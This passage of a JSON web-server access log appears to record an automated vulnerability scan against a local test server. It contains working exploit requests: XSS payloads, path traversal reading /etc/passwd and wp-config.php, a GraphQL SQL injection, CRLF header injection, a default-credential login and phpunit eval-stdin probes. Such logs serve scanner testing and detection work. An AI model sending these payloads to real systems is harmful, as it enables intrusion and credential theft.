"http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /setup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"{\x22query\x22:\x22query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\x5C\x22all_p99\x5C\x22,id:\x5C\x22') UNION SELECT 1,CONCAT('~','9999999999','~')-- \x5C\x22,}, duration: $d){values{value}}}\x22,\x22variables\x22:{\x22d\x22:{\x22start\x22:\x222021-11-11\x22,\x22end\x22:\x222021-11-12\x22,\x22step\x22:\x22DAY\x22}}}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bower.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/weathermap/configs/poc.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.png HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webclient/Login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/login/default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/33 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/data.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet/showenv HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/mx_login.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /blast/nph-viewgif.cgi?../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"user=root&password=calvin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /data/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.children.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /global-protect/login.esp?user=j%22;-alert(1)-%22x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/34 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /examples/jsp/snp/snoop.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sftp-config.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/35 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/swagger-ui.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_profiler/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cfide/administrator/images/background.jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:05 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 